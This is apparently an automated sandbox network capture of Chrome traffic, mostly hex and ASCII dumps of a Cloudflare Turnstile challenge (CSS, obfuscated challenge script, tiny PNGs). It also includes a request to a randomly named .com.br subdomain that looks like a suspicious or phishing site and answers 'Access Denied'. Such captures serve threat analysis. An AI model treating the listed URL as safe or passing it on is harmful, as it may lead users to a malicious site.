                                                        2025-03-17 16:42:29 UTC1369INData Raw: 74 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 7d 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 34 70 78 20 34 70 78 20 30 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 6c 65 66 74 3a 35 70 78 3b 74 6f 70 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 77 69
                                                        Data Ascii: t:checked~.cb-i{background-color:#fff;border-radius:5px;opacity:1;transform:rotate(0deg) scale(1)}.cb-lb input:checked~.cb-i:after{border:solid #c44d0e;border-radius:0;border-width:0 4px 4px 0;height:12px;left:5px;top:0;transform:rotate(45deg) scale(1);wi
                                                        2025-03-17 16:42:29 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 20 73 70 61 63 65 2d 65 76 65 6e 6c 79 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 7b 6d 61 72 67 69 6e 3a
                                                        Data Ascii: content:center space-evenly;visibility:visible}.size-compact #expired-text,.size-compact #overrun-text,.size-compact #timeout-text{display:block}.size-compact #expired-refresh-link,.size-compact #timeout-refresh-link,.size-compact .error-message a{margin:
                                                        2025-03-17 16:42:29 UTC1369INData Raw: 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 36 70 78 7d 23 74 65 72 6d 73 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 70 78 7d 23 74 65 72 6d 73 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 20 2e 32 72 65 6d 7d 23 74 65 72 6d 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 23 74 65 72 6d 73 20 61 2c 23 74 65 72 6d 73 20 61 3a 6c 69 6e 6b 2c 23 74 65 72 6d 73 20 61 3a 76 69 73 69 74 65 64 7b 63
                                                        Data Ascii: r{margin-left:0;margin-right:16px}#terms{color:#232323;display:inline-flex;font-size:8px;font-style:normal;justify-content:flex-end;line-height:10px}#terms .link-spacer{margin:0 .2rem}#terms a{display:inline-block}#terms a,#terms a:link,#terms a:visited{c


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449737104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:30 UTC772OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=921df19f1aa9330c&lang=auto HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:30 UTC331INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:30 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 117123
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Server: cloudflare
                                                        CF-RAY: 921df1a44e187095-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:30 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 6e 69 45 44 61 35 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73
                                                        Data Ascii: window._cf_chl_opt.niEDa5={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebs
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73
                                                        Data Ascii: %20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 67 75 69 64 65 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 61 75 78 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 65 4d 2c 65 4e 2c 65 51 2c 65 52 2c 66 68 2c 66 69 2c 66 6d 2c 66 6e 2c 66 71 2c 66 74 2c 66 76 2c 66 77 2c 66 78 2c 66 4a 2c 66 56 2c
                                                        Data Ascii: be%20embedded%20into%20a%20parent%20page."},"polyfills":{"feedback_report_output_subtitle":false,"feedback_report_guideline":false,"feedback_report_aux_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fh,fi,fm,fn,fq,ft,fv,fw,fx,fJ,fV,
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 28 34 37 30 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 6e 2c 48 29 7b 66 6f 72 28 68 6e 3d 68 6d 2c 47 5b 68 6e 28 36 38 38 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 68 6e 28 31 32 36 32 29 5d 3b 6f 5b 68 6e 28 31 32 38 33 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 68 6e 28 31 31 38 36 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 6d 28 36 35 31 29 5d 5b 68 6d 28 35 34 36 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 68 6d 28 31 36 39 39 29 5d 28 43 2c 78 5b 68 6d 28 31 32 36 32 29 5d 29 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 6d 28 31 31 33 39 29 5d 28 66 6b 2c 67 2c 68 2c 44 29 2c 6f 5b 68 6d 28 31 35 36 37 29 5d 28
                                                        Data Ascii: (470))](x)):function(G,hn,H){for(hn=hm,G[hn(688)](),H=0;H<G[hn(1262)];o[hn(1283)](G[H],G[H+1])?G[hn(1186)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hm(651)][hm(546)](B),C=0;o[hm(1699)](C,x[hm(1262)]);D=x[C],E=o[hm(1139)](fk,g,h,D),o[hm(1567)](
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 33 35 33 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 71 28 36 37 30 29 5d 5b 68 71 28 37 32 35 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 71 28 36 37 30 29 5d 5b 68 71 28 34 33 36 29 5d 2c 27 63 6f 64 65 27 3a 68 71 28 36 39 37 29 2c 27 72 63 56 27 3a 65 4d 5b 68 71 28 36 37 30 29 5d 5b 68 71 28 31 33 34 31 29 5d 7d 2c 27 2a 27 29 29 7d 2c 65 29 7d 2c 65 4d 5b 67 4a 28 35 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 68 72 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 76 2c 78 2c 42 29 7b 6b 3d 28 68 72 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 68 72 28 31 36 33 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 44 3d 3d 3d 43 7d 2c 6a 5b 68 72 28 31 31 39 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29
                                                        Data Ascii: 353),'cfChlOut':eM[hq(670)][hq(725)],'cfChlOutS':eM[hq(670)][hq(436)],'code':hq(697),'rcV':eM[hq(670)][hq(1341)]},'*'))},e)},eM[gJ(541)]=function(g,h,i,hr,j,k,l,m,n,o,s,v,x,B){k=(hr=gJ,j={},j[hr(1636)]=function(C,D){return D===C},j[hr(1190)]=function(C,D)
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 37 36 34 29 5d 3d 68 73 28 31 36 32 39 29 2c 66 5b 68 73 28 36 31 31 29 5d 3d 68 73 28 31 36 31 38 29 2c 67 3d 66 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 67 5b 68 73 28 34 35 36 29 5d 28 68 73 28 35 30 37 29 2c 68 73 28 35 30 37 29 29 3f 28 78 3d 69 28 67 5b 68 73 28 36 35 39 29 5d 2c 68 73 28 35 32 39 29 29 2c 42 3d 6a 5b 68 73 28 34 39 36 29 5d 28 67 5b 68 73 28 35 35 32 29 5d 29 2c 42 2e 69 64 3d 68 73 28 31 34 30 35 29 2c 42 5b 68 73 28 31 34 38 37 29 5d 3d 6b 28 67 5b 68 73 28 31 32 39 34 29 5d 29 2c 43 3d 6c 5b 68 73 28 34 39 36 29 5d 28 27 61 27 29 2c 43 5b 68 73 28 31 37 33 36 29 5d 3d 68 73 28 31 37 38 32 29 2c 43 2e 69 64 3d 68 73 28 31 33 33 32 29 2c 43 5b 68 73 28 31 34 38 37 29 5d 3d 6d 28 68 73 28 31 30 35 34 29 29 2c 78
                                                        Data Ascii: 764)]=hs(1629),f[hs(611)]=hs(1618),g=f,e instanceof Error)g[hs(456)](hs(507),hs(507))?(x=i(g[hs(659)],hs(529)),B=j[hs(496)](g[hs(552)]),B.id=hs(1405),B[hs(1487)]=k(g[hs(1294)]),C=l[hs(496)]('a'),C[hs(1736)]=hs(1782),C.id=hs(1332),C[hs(1487)]=m(hs(1054)),x
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 31 32 38 29 5d 5b 67 4a 28 36 30 33 29 5d 2c 66 4a 3d 21 5b 5d 2c 66 56 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 33 37 39 29 5d 28 67 4a 28 37 32 34 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 65 2c 64 2c 65 29 7b 69 65 3d 67 4a 2c 64 3d 7b 27 4d 4f 46 6d 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 68 4b 5a 6e 69 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 4c 7a 57 46 49 27 3a 69 65 28 37 37 34 29 2c 27 76 65 67 64 67 27 3a 69 65 28 35 32 33 29 2c 27 50 44 4c 42 78 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 64 6f 47 4e 42 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c
                                                        Data Ascii: 128)][gJ(603)],fJ=![],fV=undefined,eM[gJ(379)](gJ(724),function(c,ie,d,e){ie=gJ,d={'MOFmz':function(f){return f()},'hKZni':function(f,g){return f===g},'LzWFI':ie(774),'vegdg':ie(523),'PDLBx':function(f,g){return f===g},'doGNB':function(f,g){return f===g},
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 6d 3d 3d 3d 6c 7d 2c 27 6e 4c 54 4b 68 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 4f 70 54 64 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 4b 4b 46 55 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 25 6d 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 66 5b 69 56 28 31 35 36 34 29 5d 28 65 4d 5b 69 56 28 36 37 30 29 5d 5b 69 56 28 31 30 32 33 29 5d 2c 27 5f 27 29 2b 30 2c 6a 3d 6a 5b 69 56 28 31 32 38 34 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 69 57 29 7b 69 66 28 69 57 3d 69 56 2c 66 5b 69 57 28 38 37 34 29 5d 28 69 57 28 31 32 31 33 29 2c 69 57 28 31 32 31 33 29 29 29 68 5e 3d 6a 5b 69 57 28 38 39
                                                        Data Ascii: ){return m===l},'nLTKh':function(l,m){return l+m},'OpTdl':function(l,m){return l(m)},'KKFUM':function(l,m){return l%m}},k,h=32,j=f[iV(1564)](eM[iV(670)][iV(1023)],'_')+0,j=j[iV(1284)](/./g,function(l,m,iW){if(iW=iV,f[iW(874)](iW(1213),iW(1213)))h^=j[iW(89
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4c 78 57 68 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 70 42 4e 4c 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 47 79 47 77 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 58 5a 43 6b 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 77 50 75 44 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 6c 55 4b 59 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 44 70 71 6c 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74
                                                        Data Ascii: ction(h,i){return h==i},'LxWhJ':function(h,i){return h(i)},'pBNLr':function(h,i){return h<i},'GyGwx':function(h,i){return h|i},'XZCkt':function(h,i){return h>i},'wPuDQ':function(h,i){return h!=i},'lUKYL':function(h,i){return i&h},'DpqlT':function(h,i){ret
                                                        2025-03-17 16:42:30 UTC1369INData Raw: 73 65 27 33 27 3a 69 66 28 4f 62 6a 65 63 74 5b 6a 73 28 34 36 34 29 5d 5b 6a 73 28 37 33 31 29 5d 5b 6a 73 28 31 36 34 39 29 5d 28 43 2c 44 29 29 7b 69 66 28 32 35 36 3e 44 5b 6a 73 28 38 39 39 29 5d 28 30 29 29 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 4a 3d 3d 64 5b 6a 73 28 31 31 39 33 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 6a 73 28 35 35 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 50 3d 44 5b 6a 73 28 38 39 39 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 6a 73 28 39 36 30 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 6a 73 28 39 31 38 29 5d 28 49 3c 3c 31 2e 34 33 2c 64 5b 6a 73 28 31 30 31 36 29 5d 28 50 2c 31 29 29 2c 4a 3d 3d 64 5b 6a 73 28 31 31 39 33 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 6a 73 28
                                                        Data Ascii: se'3':if(Object[js(464)][js(731)][js(1649)](C,D)){if(256>D[js(899)](0)){for(x=0;x<G;I<<=1,J==d[js(1193)](j,1)?(J=0,H[js(558)](o(I)),I=0):J++,x++);for(P=D[js(899)](0),x=0;d[js(960)](8,x);I=d[js(918)](I<<1.43,d[js(1016)](P,1)),J==d[js(1193)](j,1)?(J=0,H[js(


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449738104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:30 UTC784OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:30 UTC240INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:30 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 921df1a46e2f4308-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:30 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449739104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:31 UTC425OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:31 UTC240INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:31 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 921df1a9b8ca42d0-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.44974023.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:31 UTC828OUTGET /favicon.ico HTTP/1.1
                                                        Host: h89s9dhj.ccbequipamentos.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854c
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk
                                                        2025-03-17 16:42:31 UTC122INHTTP/1.1 500 Internal Server Error
                                                        Date: Mon, 17 Mar 2025 16:42:31 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-17 16:42:31 UTC33INData Raw: 31 36 0d 0a 3c 68 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 68 31 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 16<h1>Access Denied</h1>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449741104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:31 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 3593
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: text/plain;charset=UTF-8
                                                        cf-chl: 5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa
                                                        cf-chl-ra: 0
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
